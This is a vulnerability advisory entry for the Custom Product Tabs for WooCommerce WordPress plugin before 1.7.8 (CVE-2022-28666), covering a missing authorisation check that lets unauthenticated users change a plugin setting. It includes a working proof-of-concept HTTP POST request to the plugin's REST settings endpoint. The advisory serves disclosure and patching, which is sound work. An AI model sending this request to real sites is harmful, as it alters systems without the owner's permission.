WordPress Plugin Vulnerabilities

Custom Product Tabs for WooCommerce < 1.7.8 - Unauthenticated Toggle Content Setting Update

Description

The plugin does not have proper authorisation in one of its REST endpoint, allowing unauthenticated users to update the "Toggle the_content filter" setting

Proof of Concept

POST /wp-json/yikes/cpt/v1/settings HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 24
Connection: close

toggle_the_content=false

Affects Plugins

Plugin icon
yikes-inc-easy-custom-woocommerce-product-tabs
Fixed in 1.7.8

References

CVE
CVE-2022-28666

Classification

Type
ACCESS CONTROLS
OWASP top 10
A5: Broken Access Control
CWE
CWE-284
CVSS
5.3 (medium)

Miscellaneous

Original Researcher
Tien Nguyen Anh
Verified
Yes
WPVDB ID
2f20e14b-3a97-41c5-a3ce-054ed2450aa3

Timeline

Publicly Published
2022-06-28 (about 1 years ago)
Added
2022-06-28 (about 1 years ago)
Last Updated
2023-04-04 (about 1 years ago)

Other

Published
Title
Published
2021-10-05
Title
Simple Download Monitor < 3.9.6 - Arbitrary Thumbnails Removal
Published
2015-07-15
Title
WP Attachment Export < 0.2.4 - Unauthenticated Posts Download
Published
2024-05-03
Title
SimpleShop < 2.10.1 - Cross-Site Request Forgery
Published
2023-10-24
Title
Draw Attention < 2.0.16 - Improper Access Control via register_cpt
Published
2021-10-18
Title
Insert Pages < 3.7.0 - Contributor+ Arbitrary Posts/Pages Access